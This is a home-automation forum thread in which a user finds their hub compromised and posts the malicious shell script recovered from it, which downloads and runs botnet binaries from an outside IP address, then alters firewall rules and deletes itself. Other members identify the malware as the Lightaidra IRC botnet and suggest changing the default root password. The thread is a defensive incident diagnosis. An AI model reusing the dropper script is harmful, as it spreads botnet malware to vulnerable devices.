Has somebody been sniffing round my hub?

6 replies [Last post]
mark_baldwin
Offline
Blackburn, United Kingdom
Joined: 19 May 2012

I was having a tinker to see if I could get a flaky homehub up and running. I telnet(ed) into the hub and started typing commands ready to start plugboard up in debug so I can see the incoming RF feeds, then I remembered that last time I was in there I did the same thing so started scrolling through the buffer of previous commands.

Instead of the last command I type I found these

echo test

echo connectioncheck

cat /proc/cpuinfo

 uname -a

cd /var/www

ls

looks like someone has been having a snoop :) good look to them on taking over :)

allanayr
Offline
Ayr, United Kingdom
Joined: 25 Sep 2011
More sniffing?

I was in my system this morning and in response to a ps I got:

160 root 3628 S /usr/bin/xap-twitter -i br0
163 root 4312 S lua /etc/plugboard/plugboard.lua
231 root 1800 S sh /var/run/getbinaries.sh
237 root 1784 S wget -c http://5.199.130.82/google/mel -P /var/run
612 root 1808 S -ash
620 root 1784 R ps

 

231 and 237 look a bit suspect. This is what is in getbinaries.sh

 

#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.

# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://5.199.130.82/google"
mkdir /var/etc
touch /var/etc/.aidrascan.log
chmod 777 /var/etc/.aidrascan.log

# NAME OF BINARIES:
REFERENCE_MIPSEL="mel"
REFERENCE_MIPS="m"
REFERENCE_SUPERH="s"
REFERENCE_ARM="a"
REFERENCE_PPC="p"

rm -fr /var/run/${REFERENCE_MIPSEL} \
/var/run/${REFERENCE_MIPS} \
/var/run/${REFERENCE_SUPERH} \
/var/run/${REFERENCE_ARM} \
/var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/$
{REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${R
EFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${RE
FERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${RE
FERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/$
{REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
wget -c ${REFERENCE_HTTP}/x -P /var/run && chmod +x /var/run/x && /var/run/x

iptables -A INPUT -p tcp -d 10.0.0.0/8 --dport 23 -j ACCEPT
iptables -A INPUT -p tcp -d 10.0.0.0/8 --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -d 127.0.0.0/8 --dport 23 -j ACCEPT
iptables -A INPUT -p tcp -d 127.0.0.0/8 --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -d 192.168.0.0/16 --dport 23 -j ACCEPT
iptables -A INPUT -p tcp -d 192.168.0.0/16 --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 80 -j DROP

sleep 3;
rm -fr /var/run/getbinaries.sh

Is this some legitimate process or have I been hacked?

 

BoxingOrange
Offline
United Kingdom
Joined: 11 Jun 2010
Open Ports

It would be interesting to know if you have setup remote access to your HAH and which ports you have open on your router.  It doesn't look good though :(

 

UPDATE:

OK, so the last executable it downloads, the "x" file, is the bad one.  If you download it and look at it with Notepad++ you can see at the end of the file that it looks like some remote bot software.  The are a series of IP's and ports as well as a .asp file that looks like they get downloaded.  Further on, you can see all the cammands that can be executed, ie DDOS, SCAN and SYNFLOOD commands.  

I'd say YES, you have been hacked.  I think you've been hacked with this :- http://vierko.org/tech/lightaidra-0x2012/, or at least a version of it.

 

 

 

One key bit of information is a host name "automation.whatsmyip.com", does that belong to anyone here?

allanayr
Offline
Ayr, United Kingdom
Joined: 25 Sep 2011
open ports

The open ports on the box are 22, 23 and 80.

Interestingly enough I just changed my router to a static IP address the other day so perhaps this is why I've been targeted. I hope it's not all over my network by now. Aaaargh!

mark_baldwin
Offline
Blackburn, United Kingdom
Joined: 19 May 2012
I'd kill the processes and

I'd kill the processes and change your password.

I've had nothing since I changed from the default root/admin login

brett
Offline
Providence, United States
Joined: 9 Jan 2010
I downloaded that MEL binary

I downloaded that MEL binary and its looks like some sort of botnet control backend.

Its some sort of C program and this particular string looked interesting as it tells you the name of this program and its version number.

PRIVMSG %s :[version] lightaidra 0x2012.

Popping "lightaidra" in google gets you some intersting reading on what this program is and does.

I traced back the IP of where this binary is coming from to a provider in Germany and I've contacted them about some suspcious activity being hosted within the IP range that they are assigned.

Brett

allanayr
Offline
Ayr, United Kingdom
Joined: 25 Sep 2011
Thanks

Thanks for all your help on this Guys.

Lesson learned! I had been fiddling around with remote access and had moved the box into the DMZ on my router. I didn't really make much progress and kinda forgot that I'd done it.

I'd moved my attention to setting up my RasPi as a VPN server which gives me remote access to the HAH anyway because the LAN is available when I'm logged into the VPN. I had (mistakenly) believed that the root password was not changeable on the HAH and therefore it was still set to admin. I've now moved the box out of the DMZ and reset the root password so hopefully all should be good now.

 

Hardware Info